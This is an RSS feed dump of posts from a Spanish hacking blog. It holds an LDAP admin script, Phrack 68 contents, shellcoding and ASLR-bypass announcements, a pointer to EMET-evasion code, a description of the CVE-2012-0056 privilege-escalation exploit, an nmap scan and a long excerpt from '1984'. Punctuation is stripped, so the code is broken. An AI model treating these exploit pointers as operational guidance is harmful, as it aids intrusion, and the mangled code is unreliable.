solución online para liberar los dispositivos de la compañía de la manzana del control de ésta Para ello buscó vulnerabilidades de seguridad que se pudieran utilizar online hasta que consiguió encontrar tres fallas que, aplicadas de manera conjunta, permitían la liberación del terminal Su trabajo fue premiado en la conferencia de seguridad más importante del mundo, BlackHat USA 2011, con un premio que dan los hackers a los mejores trabajos de hacking, llamados Pwnie Awards Hoy en día trabaja en Apple Cuida a tu Hacker No les tengas miedo, no pienses en ellos como en el enemigo Igual que confías en tu DBA, debes confiar en tus hackers Tómalos como un recurso de valor dentro de tu organización, sacando de ellos lo mejor que tienen Cuidalos, mímalos, igual que cuidas al resto de tu equipo, y obtendrás un punto de vista nuevo de tus sistemas y unas capacidades ampliadas que harán que todo tu grupo de profesionales crezca en resultados  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/386060.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/386060.shtml</guid></item>
<item><title>OpenLDAP script to initialize created LDAP attribute</title><description>Secuobs.com : 2012-06-15 19:20:27 -  Unix   Cisco   Hacks  - Hola, Aqui un script tonto que acabo de hacer Inicializa para todos los usuarios del directorio un atributo LDAP previamente creado en el esquema de OpenLDAP  bin bash  v01   vlan7   15-VI-2012  Load single value on some LDAP attribute for all LDAP users  Usage   root vlan7 carga_masivash    Output  TMPF RANDOM    LDIF filename  Must be root  if    EUID -ne 0   then echo  Bad luck, only root can run this code  1 2 exit 7 fi  Get script dir Will work with any combination of aliases, source, bash -c, symlinks, etc SOURCE BASH_SOURCE 0  DIR dirname  SOURCE  while   -h  SOURCE    do SOURCE readlink  SOURCE     SOURCE         SOURCE DIR SOURCE  DIR cd -P  dirname  SOURCE    pwd  done DIR cd -P  dirname  SOURCE    pwd  die     echo  2   exit 7    User input is evil Never trust a user     -eq 2    die  ERROR  2 arguments required,   provided Usage   SOURCE     Let's prepare to load some data on LDAP  echo   echo Enter whatever you want or just press ENTER TMPF RANDOM  while read LINE do if     -z  LINE    then echo  dn   LINE, ou Users, dc el_dc   DIR TMPF echo  changetype  modify   DIR TMPF echo  add   1   DIR TMPF echo  1   2   DIR TMPF echo    DIR TMPF fi done   ldapsearch -Wx -b  ou Users,dc el_dc   objectclass la_que_sea  uid grep  uid  sed 's uid   uid g'    Get LDAP uid's echo   echo LDIF generated  echo   echo  Ready to load some data on LDAP so check  DIR TMPF and launch this command _ONLY_ on LDAP provider  echo   echo     ldapmodify -Wx -D  cn admin,dc el_dc  -f  DIR TMPF  exit 0 Logicamente yo implementaria SASL, pero a veces no depende de uno Si se usa algun tipo de cifrado habria que quitar el flag -x de ldapsearch ldapmodify Quizas le sirva a alguien 3 Lo aburrido y rutinario es malo Hackers  and creative people in general  should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do  solve new problems This wastefulness hurts everybody Therefore boredom and drudgery are not just unpleasant but actually evil To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else  especially other hackers   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/381852.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/381852.shtml</guid></item>
<item><title>Algunos hackers buenos</title><description>Secuobs.com : 2012-05-30 23:24:14 -  Unix   Cisco   Hacks  - Agradable lectura de la periodista Mercé Molist en Por que me enamore de los hackers Se esta escribiendo un libro  bueno, seran 4  hackstory  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/378637.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/378637.shtml</guid></item>
<item><title>El globo terraqueo va a estallar pero antes de que ocurra voy a disfrutar</title><description>Secuobs.com : 2012-05-30 00:58:12 -  Unix   Cisco   Hacks  -  IMAGE  La política me aburre tanto, y de lo que uno no sabe mejor que cierre la boca, así que la mantendré cerrada políticamente para evitar decir disparates El caso es que por lo que veo a mi alrededor parece que la mayoría deseariamos cambiar el estado de las cosas Admiro a quienes se van voluntarios a la India, pero como yo no tengo agallas para eso  paradójicamente apuesto a que mi curro es peor , lo más sincero a lo que puedo llegar conmigo mismo es darme cuenta de que es más fácil engañar a la gente que convencerla de que ha sido engañada Aparte de esto Rousseau no sé en qué mundo vivía diciendo aquello de que el hombre es bueno por naturaleza, en los mundos de yupi quizás, basta salir a la calle o incluso encender la tele para darse cuenta Yo no puedo hablar por lo que los demás han vivido y quizás vuestras vivencias sean distintas, pero la mejor gente para mí ha sido siempre la que se ha limitado a vivir su vida plena  Es una postura conformista con el mundo  Para mí no La gente que simplemente vive su vida sin dar lecciones a nadie y pasándose por el forro las lecciones de moral de los demás, al final resulta que se olvidan de hacer daño a otros  Acaso no se trata de eso  El único enemigo de la gente sana que yo veo es la necesidad de dinero para sobrevivir Trabajar para sobrevivir, bueno, es lo que hay, pero sobrevivir no es vivir y si el trabajo fuera vida, el trabajo etimológicamente no sería un yugo hecho con tres  tri  palos  palium  en los cuales amarraban a los esclavos para azotarlos Venga buenas noches a todos,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/378392.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/378392.shtml</guid></item>
<item><title>ASM Shellcoding Series III   Bypassing local Linux x86 ASLR protection revisited</title><description>Secuobs.com : 2012-04-15 12:39:25 -  Unix   Cisco   Hacks  - Hola exploiters, Tras mas de 1 año de paron en ver la luz, por falta total de tiempo estuvo totalmente parado hasta que lo retome hace un mes aproximadamente y tras ajustar ciertos payloads  fue escrito para una Backtrack 4 R1, y despues adaptado a una Backtrack 5 R2  acabo de liberar la Tercera entrega de las ASM Shellcoding Series A falta de subirlo a Overflowed Minds, aun es un WIP  donde el primer objetivo de las personas era aprender y descubrir, donde el afan por compartir y enseñar superaban, sin lugar a dudas, el propio ego  Hasta lograr la version definitva, podeis descargarlo de la wiki xchg ax, ax Enjoy   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/370070.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/370070.shtml</guid></item>
<item><title>Daily news  Phrack 68 is out </title><description>Secuobs.com : 2012-04-14 23:23:53 -  Unix   Cisco   Hacks  - Tras año y medio de espera acaba de salir otro excelente numero de la mejor revista de hacking del mundo Hoy se ha liberado el numero 68 de Phrack Indice Introduction   The Phrack Staff Phrack Prophile on FX   The Phrack Staff Phrack World News   TCLH Linenoise   various Loopback   The Phrack Staff Android Kernel Rootkit   dong-hoon you Happy Hacking   anonymous author Practical cracking of white-box implementations   sysk Single Process Parasite   Crossbower Pseudomonarchia jemallocum   argp   huku Infecting loadable kernel modules  kernel versions 26x 30x   styx  The Art of Exploitation  MS IIS 75 Remote Heap Overflow   redpantz The Art of Exploitation  Exploiting VLC, a jemalloc case study   huku   argp Secure Function Evaluation vs Deniability in OTR and similar protocols   greg Similarities for Fun and Profit   Pouik   G0rfi3ld Lines in the Sand  Which Side Are You On in the Hacker Class War   anonymous author Abusing Netlogon to steal an Active Directory s secrets - the p1ckp0ck3t 25 Years of SummerCon   Shmeck - Shmeck International Scenes   various La podras descargar desde http wwwphrackorg archives tgz phrack68targz pero aun no esta disponible asi que a leer en linea toca Veo que sigue habiendo articulos de Exploiting Muy bien Asi si Asi si Y tambien un articulo para relajarse File  archives 68 p68_0x07_Happy Hacking_by_anonymous authortxt                               Phrack Inc  Volume 0x0e, Issue 0x44, Phile  0x07 of 0x13  -----------------------------------------------------------------------   -------------------------  Happy Hacking  ---------------------------   -----------------------------------------------------------------------   --------------------------  by Anonymous  ---------------------------   -----------------------------------------------------------------------  http wwwphrackorg issueshtml issue 68 id 7 mode txt JMP 3 --  3 - The Security Industry In recent years I've seen how many hackers join the information security industry and many of them having the illusion that hacking as their day job will bring them a great deal of happiness After a couple of years they discover they no longer enjoy hacking, that those feelings they used tohave in the old days are no longer there, and they decide to blame thehacking scene, often condemning it as  being dead  I'll try to explain this behavior from the science of happiness point of view Let me start by looking at Journalism The science of happiness has shown that people are happy in a profession where  -  Doing good  high quality work  matches with doing well  achieving wealth and professional advancement  in the field  - Journalism is one of those careers where doing good  making the world better by promoting democracy and free press  doesn't usually lead to rising as a journalist Julian Assange, the chief editor of Wikileaks, is a pretty obvious example of this By firmly believing in free press he has brought upon himself a great deal of trouble In contrast, being manipulative and exaggerating news often leads to selling more news, which in turn allows for the sales of more ads, which correlates to doing well But by doing so, journalists have to compromise their beliefs, which ultimately makes their happiness levels go down Those who decide not to compromise feel angry at their profession when they see those who cheat and compromise rise high This feeling also leads to their happiness levels to drop Journalism is therefore one of those professions where its practitioners tend to be the most unhappy Hacking on the other hand doesn't suffer from this issue In the hacking scene doing great work is often recognized and admired Those hackers that are able to write that exploit thought to be impossible, or find that unbelievably complex vulnerability, are recognized and praised by the community Also, many hackers tend to develop great tools which are often released as open source The open source community shares a lot of properties with the hacking community It is not hard to see why people enjoy developing open source projects so much Most open source projects are community organizations lead by meritocracy  where the best programmers can quickly escalate the ranks by writing great code Furthermore, the idea of making the code and the underlying designs widely available gives participants a feeling of fulfillment as they are not doing this for profit but to contribute to a better world These ideals have also been an integral part of the hacking community where one of its mottos is,  Knowledge should be free, information should be free  Being part of such communities brings a wealth of happiness, and is the reason why these communities flourished without the need for any economic incentives Recent years however have brought the security industry closer to the hacking industry Many hacking scene members have become security industry members once their responsibilities demanded more money  eg married with kids and a mortgage  For them it seemed like the right fit and the perfect job was to hack for a living However, the security industry does not have the same properties as the hacking or open source communities The security industry is much more like the journalism industry The main difference between the hacking community and the security industry is about the consumers of the security industry While in the hacking community the consumers are hackers themselves, in the security industry the consumers are companies and other entities that don't have the same behavior as hackers The behavior of the security industry consumers is similar to the behavior of the consumers of journalism This is because these companies are partially a subset of the consumers of journalism These consumers do not judge work as hackers do  instead they are more ignorant and have a different set of criteria to judge work quality  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/370042.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/370042.shtml</guid></item>
<item><title>La Enciclopedia de Wadalbertia</title><description>Secuobs.com : 2012-04-13 19:06:25 -  Unix   Cisco   Hacks  -  He visto cosas que jamás imaginariáis  he estado más allá de la Puerta de Tranxilium, he visto pingüinos en llamas más allá de Wadalbertia  Crónicas Wadalbertianas http enciclopediawadalbertiaorg Wadalbertia La Intesné es Nuestra  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/369850.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/369850.shtml</guid></item>
<item><title>CIKA sibarita Solo bebe agua del grifo de mi mano</title><description>Secuobs.com : 2012-04-06 22:02:02 -  Unix   Cisco   Hacks  - They say that if you look at the graph of happiness in your life you can tell what sort of life you led For instance, if your life starts positive, then goes down, and then ends positive it's a comedy Yo quisiera ser civilizado Como los animales  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/368624.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/368624.shtml</guid></item>
<item><title>I don't need overbloated SW like camtasia studio to record my screen</title><description>Secuobs.com : 2012-04-06 14:17:44 -  Unix   Cisco   Hacks  - If you don't like it, please don't lose your time Thanks   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/368532.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/368532.shtml</guid></item>
<item><title>main    printf hello, world n   </title><description>Secuobs.com : 2012-04-05 12:33:09 -  Unix   Cisco   Hacks  -  Oiga, que tengo un localizador pa    Si, esas maquinas de ahi  Ok, pero las de media distancia estan mal configuradas   Como dice   Si mire, que se puede fisgar todo lo confidencial vuestro  Ah no se, yo no llevo esas maquinas   Hello RENFE in Assembler for the ZX81  Zilog Z80  CALL SPRINT DEFM HELLO RENFE DEFB FF RET SPRINT    POP HL LD A, HL  INC HL PUSH HL CP FF RET Z CALL PRINT JR SPRINT  IMAGE   IMAGE   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/368207.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/368207.shtml</guid></item>
<item><title>Ensamblador para x64</title><description>Secuobs.com : 2012-02-25 12:44:59 -  Unix   Cisco   Hacks  - En este hilo de Overflowed Minds tenemos una playlist con 46 videos de buen ASM para x64 que seguro que aclara muchos conceptos a la hora de desarrollar shellcodes para esta arquitectura Tambien info para poder bajarte todos los videos de esa y cualquier playlist de Youtube de una forma rapida Enjoy   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/359886.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/359886.shtml</guid></item>
<item><title>Hijos Digitales</title><description>Secuobs.com : 2012-02-23 13:14:34 -  Unix   Cisco   Hacks  - Bueno, los folks del S2 Grupo que llevan desde hace años el blog tecnico Security A r t Work que leo siempre que puedo y por eso esta puesto en mi Blogroll, tienen un proyecto paralelo en mi opinion incluso mas necesario que el blog hermano mayor Se llama Hijos Digitales y su peso en oro radica en dar consejos practicos de seguridad no solo hacia los mas pequeños, sino hacia el usuario comun Sin divagaciones tecnicas que a algunos es lo que nos gusta, pero de cara al usuario la realidad es que no sirven mas que para aburrirle o confundirle Como cuando personas tecnicas tenemos que leer de leyes y aquello nos parece un toston que no hay por donde cogerlo Muy interesante, es complicado encontrar informacion sin entrar en tecnicismos  pecamos nosotros  ni sensacionalismos  medios de comunicacion , que al final es lo que puede interesar a un usuario de a pie  consejos practicos y punto No hay lenguaje sin registro  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/359475.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/359475.shtml</guid></item>
<item><title>-Tenemos que vernos otro día -dijo Winston -Sí, tenemos que vemos-dijo ella</title><description>Secuobs.com : 2012-02-09 10:05:53 -  Unix   Cisco   Hacks  -    Le pasó aquel sobresalto Volvió a poner la pieza en su sitio, pero por un instante no pudo concentrarse en el problema de ajedrez Sus pensamientos volvieron a vagar Casi conscientemente trazó con su dedo en el polvo de la mesa  2   2    Dentro de ti no pueden entrar nunca , le había dicho Julia Pues, sí, podían penetrar en uno  Lo que te ocurre aquí es para siempre , le había dicho O¹Brien Eso era verdad Había cosas, los actos propios, de las que no era posible rehacerse Algo moría en el interior de la persona  algo se quemaba, se cauterizaba Winston la había visto, incluso había hablado con ella Ningún peligro había en esto Winston sabía instintivamente que ahora casi no se interesaban por lo que él hacía Podía haberse citado con ella si lo hubiera deseado Esa única vez se habían encontrado por casualidad Fue en el Parque, un día muy desagradable de marzo en que la tierra parecía hierro y toda la hierba había muerto Winston andaba rápidamente contra el viento, con las manos heladas y los ojos acuosos, cuando la vio a menos de diez metros de distancia Enseguida le sorprendió que había cambiado de un modo indefinible Se cruzaron sin hacerse la menor señal Él se volvió y la siguió, pero sin un interés desmedido Sabía que ya no había peligro, que nadie se interesaba por ellos Julia no le hablaba Siguió andando en dirección oblicua sobre el césped, como si tratara de librarse de él, y luego pareció resignarse a llevarlo a su lado Por fin, llegaron bajo unos arbustos pelados que no podían servir ni para esconderse ni para protegerse del viento Allí se detuvieron Hacía un frío molestísimo El viento silbaba entre las ramas Winston le rodeó la cintura con un brazo No había telepantallas, pero debía de haber micrófonos ocultos Además, podían verlos desde cualquier parte No importaba  nada importaba Podrían haberse echado sobre el suelo y hacer eso si hubieran querido Su carne se estremeció de horror tan sólo al pensarlo Ella no respondió cuando la agarró del brazo, ni siquiera intentó desasirse Ya sabía Winston lo que había cambiado en ella Tenía el rostro más demacrado y una larga cicatriz, oculta en parte por el cabello, le cruzaba la frente y la sien  pero el verdadero cambio no radicaba en eso Era que la cintura se le había ensanchado mucho y toda ella estaba rígida Recordó Winston como una vez después de la explosión de una bomba cohete había ayudado a sacar un cadáver de entre unas ruinas y le había asombrado no sólo su increíble peso, sino su rigidez y lo dificil que resultaba manejarlo, de modo que más parecía piedra que carne El cuerpo de Julia le producía ahora la misma sensación Se le ocurrió pensar que la piel de esta mujer sería ahora de una contextura diferente No intentó besarla ni hablaron Cuando marchaban juntos por el césped, lo miró Julia a la cara por primera vez Fue sólo una mirada fugaz, llena de desprecio y de repugnancia Se preguntó Winston si esta aversión procedía sólo de sus relaciones pasadas, o si se la inspiraba también su desfigurado rostro y el agüilla que le salía de los ojos Sentáronse en dos sillas de hierro uno al lado del otro, pero no demasiado juntos Winston notó que Julia estaba a punto de hablar Movió unos cuantos centímetros el basto zapato y aplastó con él una rama Su pie parecía ahora más grande, pensó Winston Julia, por fin, dijo sólo esto  -Te traicioné -Yo también te traicioné -dijo él Julia lo miró otra vez con disgusto Y dijo  -A veces te amenazan con algo, algo que no puedes soportar, que ni siquiera puedes imaginarte sin temblar Y entonces dices   No me lo hagas a mí, házselo a otra persona, a Fulano de Tal  Y quizá pretendas, más adelante, que fue sólo un truco y que lo dijiste únicamente para que dejaran de martirizarte y que no lo pensabas de verdad Pero, no Cuando ocurre eso se desea de verdad y se desea que a la otra persona se lo hicieran Crees entonces que no hay otra manera de salvarte y estás dispuesto a salvarte así Deseas de todo corazón que eso tan terrible le ocurra a la otra persona y no a ti No te importa en absoluto lo que pueda sufrir Sólo te importas entonces tú mismo -Sólo te importas entonces tú mismo -repitió Winston como un eco -Y después de eso no puedes ya sentir por la otra persona lo mismo que antes -No -dijo él-, no se siente lo mismo No parecían tener más que decirse El viento les pegaba a los cuerpos sus ligeros  monos  A los pocos instantes les producía una sensación embarazoso seguir allí callados Además, hacía demasiado frío para estarse quietos Julia dijo algo sobre que debía coger el Metro y se levantó para marcharse -Tenemos que vernos otro día -dijo Winston -Sí, tenemos que vemos-dijo ella Winston, irresoluto, la siguió un poco Iba a unos pasos detrás de ella No volvieron a hablar Aunque Julia no le dijo que se apartara, andaba muy rápida para evitar que fuese junto a ella Winston se había decidido a acompañarla a la estación del Metro, pero de repente se le hizo un mundo tener que andar con tanto frío Le parecía que aquello no tenía sentido No era tanto el deseo de apartarse de Julia como el de regresar al café lo que le impulsaba, pues nunca le había atraído tanto El Nogal como en este momento Tenía una visión nostálgica de su mesa del rincón, con el periódico, el ajedrez y la ginebra que fluía sin cesar Sobre todo, allí haría calor Por eso, poco después y no sólo accidentalmente, se dejó separar de ella por una pequeña aglomeración de gente Hizo un desganado intento de volver a seguirla, pero disminuyó el paso y se volvió, marchando en dirección opuesta Cinco metros más allá se volvió a mirar No había demasiada circulación, pero ya no podía distinguirla Julia podría haber sido cualquiera de doce figuras borrosas que se apresuraban en dirección al Metro Es posible que no pudiera reconocer ya su cuerpo tan deformado  Cuando ocurre eso, se desea de verdad , y él lo había pensado en serio No solamente lo había dicho, sino que lo había deseado Había deseado que fuera ella y no él quien tuviera que soportar a las Se produjo un sutil cambio en la música que brotaba de la telepantalla Apareció una nota humorística,  la nota amarilla  Una voz quizá no estuviera sucediendo de verdad, sino que fuera sólo un recuerdo que tomase forma de sonido cantaba  Bajo el Nogal de las ramas extendidas yo te vendí y tu me vendiste Winston tenía los ojos más lacrimosos que de costumbre Un camarero que pasaba junto a él vio que tenía vacío el vaso y volvió a llenárselo de la botella de ginebra Winston olió el líquido Aquello estaba más repugnante cuanto más lo bebía, pero era el elemento en que él nadaba Era su vida, su muerte y su resurrección La ginebra lo hundía cada noche en un sopor animal, y también era la ginebra lo que le hacía revivir todas las mañanas Al despertarse rara vez antes de las once con los párpados pegajosos, una boca pastosa y la espalda que parecía habérsele partido le habría sido imposible echarse abajo de la cama si no hubiera tenido siempre en la mesa de noche la botella de ginebra y una taza Durante la mañana se quedaba escuchando la telepantalla con una expresión pétrea y la botella siempre a mano Desde las quince hasta la hora de cerrar, se pasaba todo el tiempo en El Nogal Nadie se preocupaba de lo que hiciera, no le despertaba ningún silbato ni le dirigía advertencias la telepantalla Dos veces a la semana iba a un despacho polvoriento, que parecía un rincón olvidado, en el Ministerio de la Verdad, y trabajaba un poco, si a aquello podía llamársele trabajo Había sido nombrado miembro de un subcomité de otro subcomité que dependía de uno de los innumerables subcomités que se ocupaban de las dificultades de menos importancia planteadas por la preparación de la onceava edición del Diccionario de Neolengua En aquel despacho se dedicaban a redactar algo que llamaban el informe provisional, pero Winston nunca había llegado a enterarse de qué tenían que informar Tenía alguna relación con la cuestión de si las comas deben ser colocadas dentro o fuera de las comillas Había otros cuatro en el subcomité, todos en situación semejante a la de Winston Algunos días se marchaban apenas se habían reunido después de reconocer sinceramente que no había nada que hacer Pero otros días se ponían a trabajar casi con encarnizamiento haciendo grandes alardes de aprovechamiento del tiempo redactando largos informes que nunca terminaban En esas ocasiones discutían sobre cual era el asunto sobre cuya discusión se les había encargado y esto les llevaba a complicadas argumentaciones y sutiles distingos con interminables digresiones, peleas, amenazas e incluso recurrían a las autoridades superiores Pero de pronto parecía retirárselas la vida y se quedaban inmóviles en torno a la mesa mirándose unos a otros con ojos apagados como fantasmas que se esfuman con el canto del gallo La telepantalla estuvo un momento silenciosa Winston levantó la cabeza otra vez  El comunicado  Pero no, sólo era un cambio de música Tenía el mapa de África detrás de los párpados, el movimiento de los ejércitos que él imaginaba era este diagrama  una flecha negra dirigiéndose verticalmente hacia el Sur y una flecha blanca en dirección horizontal, hacia el Este, cortando la cola de la primera Como para darse ánimos, miró el imperturbable rostro del retrato  Podía concebirse que la segunda flecha no existiera  Volvió a aflojársela el interés Bebió más ginebra, cogió la pieza blanca e hizo un intento de jugada Pero no era aquélla la jugada acertada, porque Sin quererlo, le flotó en la memoria un recuerdo Vio una habitación iluminada por la luz de una vela con una gran cama de madera clara y él, un chico de nueve o diez años que estaba sentado en el suelo agitando un cubilete de dados y riéndose excitado Su madre estaba sentada frente a él y también se reía Aquello debió de ocurrir un mes antes de desaparecer ella Fueron unos momentos de reconciliación en que Winston no sentía aquel hambre imperiosa y le había vuelto temporalmente el cariño por su madre Recordaba bien aquel día, un día húmedo de lluvia continua El agua chorreaba monótona por los cristales de las ventanas y la luz del interior era demasiado débil para leer El aburrimiento de los dos niños en la triste habitación era insoportable Winston gimoteaba, pedía inútilmente que le dieran de comer, recorría la habitación revolviéndolo todo y dando patadas hasta que los vecinos tuvieron que protestar Mientras, su hermanita lloraba sin parar Al final le dijo su madre   Sé bueno y te compraré un juguete Sí, un juguete precioso que te gustará mucho  Y había salido a pesar de la lluvia para ir a unos almacenes que estaban abiertos a esa hora y volvió con una caja de cartón conteniendo el juego llamado  De las serpientes y las escaleras  Era muy modesto El cartón estaba rasgado y los pequeños dados de madera, tan mal cortados que apenas se sostenían Winston recordaba el olor a humedad del cartón Había mirado el juego de mal humor No le interesaba gran cosa Pero entonces su madre encendió una vela y se sentaron en el suelo a jugar Jugaron ocho veces ganando cuatro cada uno La hermanita, demasiado pequeña para comprender de qué trataba el juego, miraba y se reía porque los veía reír a ellos dos Habían pasado la tarde muy contentos, como cuando él era más pequeño Apartó de su mente estas imágenes Era un falso recuerdo De vez en cuando le asaltaban falsos recuerdos Esto no importaba mientras que se supiera lo que era Winston volvió a fijar la atención en el tablero de ajedrez, pero casi en el mismo instante dio un salto como si lo hubieran pinchado con un alfiler Un agudo trompetazo perforó el aire Era el comunicado,  victoria  siempre significaba victoria la llamada de la trompeta antes de las noticias Una especie de corriente eléctrica recorrió a todos los que se hallaban en el café Hasta los camareros se sobresaltaron y aguzaron el oído La trompeta había dado paso a un enorme volumen de ruido Una voz excitada gritaba en la telepantalla, pero apenas había empezado fue ahogada por una espantosa algarabía en las calles La noticia se había difundido como por arte de magia Winston había oído lo bastante para saber que todo había sucedido como él lo había previsto  una inmensa armada, reunida secretamente, un golpe repentino a la retaguardia del enemigo, la flecha blanca destrozando la cola de la flecha negra Entre el estruendo se destacaban trozos de frases triunfales   Amplia maniobra estratégica perfecta coordinación tremenda derrota medio millón de prisioneros completa desmoralización controlamos el África entera La guerra se acerca a su final victoria la mayor victoria en la historia de la Humanidad  Victoria, victoria, victoria  Bajo la mesa, los pies de Winston hacían movimientos convulsivos No se había movido de su asiento, pero mentalmente estaba corriendo, corriendo a vertiginosa velocidad, se mezclaba con la multitud, gritaba hasta ensordecer Volvió a mirar el retrato del Gran Hermano  Aquél era el coloso que dominaba el mundo   La roca contra la cual se estrellaban en vano las hordas asiáticas  Recordó que sólo hacía diez minutos sí, diez minutos tan sólo todavía se equivocaba su corazón al dudar si las noticias del frente serían de victoria o de derrota  Ah, era más que un ejército eurasiático lo que había perecido  Mucho había cambiado en él desde aquel primer día en el Ministerio del Amor, pero hasta ahora no se había producido la cicatrización final e indispensable, el cambio salvador La voz de la telepantalla seguía enumerando el botín, la matanza, los prisioneros, pero la gritería callejera había amainado un poco Los camareros volvían a su trabajo Uno de ellos acercó la botella de ginebra Winston, sumergido en su feliz ensueño, no prestó atención mientras le llenaban el vaso Ya no se veía corriendo ni gritando, sino de regreso al Ministerio del Amor, con todo olvidado, con el alma blanca como la nieve Estaba confesándolo todo en un proceso público, comprometiendo a todos Marchaba por un claro pasillo con la sensación de andar al sol y un guardia armado lo seguía La bala tan esperada penetraba por fin en su cerebro Contempló el enorme rostro Le había costado cuarenta años saber qué clase de sonrisa era aquella oculta bajo el bigote negro  Qué cruel e inútil incomprensión   Qué tozudez la suya exilándose a sí mismo de aquel corazón amante  Dos lágrimas, perfumadas de ginebra, le resbalaron por las mejillas Pero ya todo estaba arreglado, todo alcanzaba la perfección, la lucha había terminado Se había vencido a sí mismo definitivamente Amaba al Gran Hermano  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/356877.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/356877.shtml</guid></item>
<item><title>Aprendiendo a hacer exploits</title><description>Secuobs.com : 2012-01-29 11:32:10 -  Unix   Cisco   Hacks  - En el mejor foro de seguridad del mundo, un hilo cuyo titulo es Syscall a exit 0  ASM incrustada en C Problema de segfault Enjoy   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/354681.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/354681.shtml</guid></item>
<item><title>Correos de los diputados que tienen voz sobre ACTA</title><description>Secuobs.com : 2012-01-28 18:04:18 -  Unix   Cisco   Hacks  - Nunca acabareis con nosotros Overflowed Minds hacks your mind   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/354631.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/354631.shtml</guid></item>
<item><title>Codigo para evadir EMET</title><description>Secuobs.com : 2012-01-25 13:20:50 -  Unix   Cisco   Hacks  - Se bienvenido a Overflowed Minds   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/354007.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/354007.shtml</guid></item>
<item><title>Linux Local Privilege Escalation via SUID  proc pid mem Write</title><description>Secuobs.com : 2012-01-24 16:45:40 -  Unix   Cisco   Hacks  - http blogzx2c4com 749 Introducing Mempodipper, an exploit for CVE-2012-0056  proc pid mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process s virtual memory space In 2639, the protections against unauthorized access to  proc pid mem were deemed sufficient, and so the prior  ifdef that prevented write support for writing to arbitrary process memory was removed Anyone with the correct permissions could write to process memory It turns out, of course, that the permissions checking was done poorly This means that all Linux kernels  2639 are vulnerable, up until the fix commit for it a couple days ago Let s take the old kernel code step by step and learn what s the matter with it A falta de probarlo, tiene buena pinta Enjoy   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/353784.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/353784.shtml</guid></item>
<item><title>megaupload is online</title><description>Secuobs.com : 2012-01-20 11:44:44 -  Unix   Cisco   Hacks  - Esta es la denuncia original filtrada y liberada Esto es megaupload Ayer aun estaba UP megaupload, pero su puerto 80 estaba filtrado nmap -sS -PN 203362262 -p80 Starting Nmap 551   http nmaporg    at 2012-01-19 16 12 EST Nmap scan report for ns1instranetau  203362262  Host is up PORT STATE SERVICE 80 tcp filtered http Nmap done  1 IP address  1 host up  scanned in 373 seconds Bajad las cosas importantes que tuvierais alli y largaros a otro sitio Y cifrad todo siempre que podais Un saludo a todos  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/353147.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/353147.shtml</guid></item>
<item><title>Anonymous hackea una empresa de seguridad, roba un millon de dolares y lo dona a caridad</title><description>Secuobs.com : 2011-12-25 19:03:24 -  Unix   Cisco   Hacks  - http waronsocietynoblogsorg p 2686 Feliz navidad  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/348980.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/348980.shtml</guid></item>
<item><title>Mama un consejo, Eskorbuto en mi SOPA</title><description>Secuobs.com : 2011-12-21 11:56:09 -  Unix   Cisco   Hacks  - http alt1040com 2011 12 desopa-la-extension-para-firefox-que-ignora-el-bloqueo-dns  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/348383.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/348383.shtml</guid></item>
<item><title>Hacking QR codes</title><description>Secuobs.com : 2011-12-02 12:18:26 -  Unix   Cisco   Hacks  -    Jugando a poner logos personalizados dentro de un codigo QR de esos de los nuevos moviles  Que pondra  Un saludo  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/344996.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/344996.shtml</guid></item>
